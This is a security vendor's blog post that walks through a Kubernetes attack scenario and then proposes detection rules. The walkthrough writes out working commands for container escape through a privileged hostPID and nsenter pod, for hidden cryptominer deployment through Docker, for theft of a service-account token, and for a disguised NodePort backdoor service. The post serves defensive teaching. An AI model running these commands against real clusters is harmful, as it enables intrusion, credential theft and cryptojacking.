Live Demo
Blog   >   Container Security & Orchestration   >   Investigating Kubernetes Attack Scenarios in Threat Stack (part 2)

Investigating Kubernetes Attack Scenarios in Threat Stack (part 2)

In part one of this two-part series, I showed how Threat Stack captures detailed metadata about operating system behaviors as they happen. I used the example commands from attack scenario 1 from which shows an opportunistic attack to land a cryptominer. Here in part two, I’ll use attack scenario 2 to illustrate how Threat Stack observes behavior of an advanced attacker who is looking to gain persistence into the Kubernetes cluster.

Scenario 2: Sophisticated Pod Persistence

In this second scenario, a more experienced attacker finds access to another webshell. Like the first scenario, it begins with some information-gathering commands for context on where the attacker has landed.

id; uname -a; cat /etc/lsb-release /etc/redhat-release; ps -ef; env | grep -i kube

We can observe this activity as it happens in Threat Stack:

Out of the gate, there’s nothing particularly malicious about this behavior, so Threat Stack would not fire any alerts. But because the platform is continuously recording activity, this data is available and is typically used during the course of a deeper forensics investigation.

Moving on, the attacker then reviews the information. They check for Kubernetes access, and find the limits of their permissions (our friend kubectl auth can-i makes a timely reappearance):

export PATH=/tmp:$PATH
cd /tmp; curl -LO; chmod 555 kubectl
kubectl get pods
kubectl get pods --all-namespaces
kubectl get nodes
kubectl auth can-i --list

The path of the attack looks fairly similar in Threat Stack thus far:

In this case, the experienced attacker with knowledge of Kubernetes internals can ascertain that, based on the success of the commands above, they likely have the permissions of a Kubernetes namespace admin. It’s a bit of a lucky break, but not as powerful as they’d like.

Now, it’s time to try some tricks. The Google tutorial cites infosec Twitter for this command to deploy a pod to own the node:

kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}'

One of the keys to the command above is the "hostPID": true parameter, which essentially runs the container within the host server’s namespace, undoing the isolation you’d expect to get from the usual namespaces that Docker provides. And then, "nsenter" gives us low-level access to messing with the Linux kernel namespace subsystem itself. These are the basic mechanics that get the attacker to successfully break out of the container and gain root on the host.

And of course, Threat Stack’s low-level of visibility into Linux subsystems captures it all:

The attacker now has root on a node and works toward their objective of persistence. Instead of simply deploying the bitcoin miner through Kubernetes itself, the experienced attacker deploys a container directly through Docker. Since they’re root, it’s easy to do. And it’s more likely to evade detection because Kubernetes only knows what it is managing, and has no visibility into Docker commands.

The attacker launches the bitcoin miner using Docker:

docker run -d securekubernetes/bitcoinero -c1 -l10

Once the bitcoin miner is running, the attacker moves to explore the cluster. With root on the node, the attacker steals the kubelet’s client certificate. When the kubelet’s certificate does not have the necessary permissions, the attacker pivots to using the default kube-system service account token. With this bash command, the attacker creates a bash variable TOKEN and then uses it with a kubectl command to ask the Kubernetes API server if they can get secrets.

TOKEN=$(for i in `mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'`; do if [ `cat $i` = 'kube-system' ]; then cat `echo $i | sed 's/.namespace$/\/token/'`; break; fi; done)
echo -e "\n\nYou'll want to copy this for later:\n\nTOKEN=\"$TOKEN\""
kubectl --token "$TOKEN" --insecure-skip-tls-verify --server=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT auth can-i get secrets --all-namespaces

The kubectl can-i command resulted in a “yes”, and this is good news for the attacker. The attacker then moves to create a service and an endpoint that will give them remote access. The attacker ends up naming these “istio-mgmt” so as to blend in and not cause suspicion.

cat <<EOF | kubectl --token "$TOKEN" --insecure-skip-tls-verify --server=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT apply -f -
apiVersion: v1
kind: Service
  name: istio-mgmt
  namespace: kube-system
  type: NodePort
    - protocol: TCP
      nodePort: 31313
      port: 31313
apiVersion: v1
kind: Endpoints
  name: istio-mgmt
  namespace: kube-system
  - addresses:
      - ip: `sed -n 's/^  *server: https:\/\///p' /var/lib/kubelet/kubeconfig`

At this point the attacker has a bitcoin miner running on a node that is hidden from the purview of Kubernetes orchestration, and they have external access to the Kubernetes API server.

Turning Attack Signal into Alerts

As we walked through the two attack scenarios, you’re probably wondering, “How can we both detect and respond to these tactics?” All events that we previously highlighted can be used to write rules within the Threat Stack platform.

Discovery Commands

Whether you are protecting a Kubernetes cluster, a container, or an EC2 instance, a common theme among attackers is the need to explore and learn about the system they find themselves on. The discovery commands used in both attack scenarios are common, but how common are they in your environments? How do you know if you do not measure? Creating a simple rule that itemizes common discovery commands enables us to detect where we see this happening in our environments and who is doing what.

The environment-specific Kubernetes discovery commands are what the attacker used earlier. The kubectl can-i command, for example, can be used to see what permissions one has. Do your operators use this command often? Maybe just a subset? Why not write a rule and alert when this happens on a system, especially a container?

Suspicious Commands

Adding a simple rule to alert on the execution of suspicious commands or sensitive binaries can help provide visibility into behaviors about who is doing what in your environment. Should our systems have interactive users? Should those users be using binaries like nsenter?

Process Running from /tmp

Another common trend is an attacker running code from /tmp. In both scenarios the attacker downloads a binary and runs it from the /tmp directory. Knowing what commonly runs from /tmp in your environment can enable you to know when something “different” is observed. Do you normally see containers running kubectl commands? Probably not, but again, how do you know if you do not have visibility into these behaviors?

Alerts Summary

In summary, if you want to protect your Kubernetes clusters, you must be able to see what is happening in the containers within that cluster. Visibility into the pods, coupled with Kubernetes orchestration events, tell a nice story of what is happening at the orchestration layer and within the pods.

Thanks for All the Pods

A special thank you to @tabbysable, @petermbenjamin, @jimmesta, @BradGeesaman for their excellent KubeCon NA 2019 Tutorial Guide and accompanying presentation, which served as the basis for this article.

I hope it serves as a good example of the kind of full-stack security observability that Threat Stack provides — where every bit of relevant metadata is tracked across host servers, Docker, Kubernetes, and more. Not only is this useful for deep forensics, but Threat Stack’s powerful alerting engine can provide near-real-time alerts when suspicious commands are run. Let us know if you’re interested in learning more, and thanks for reading.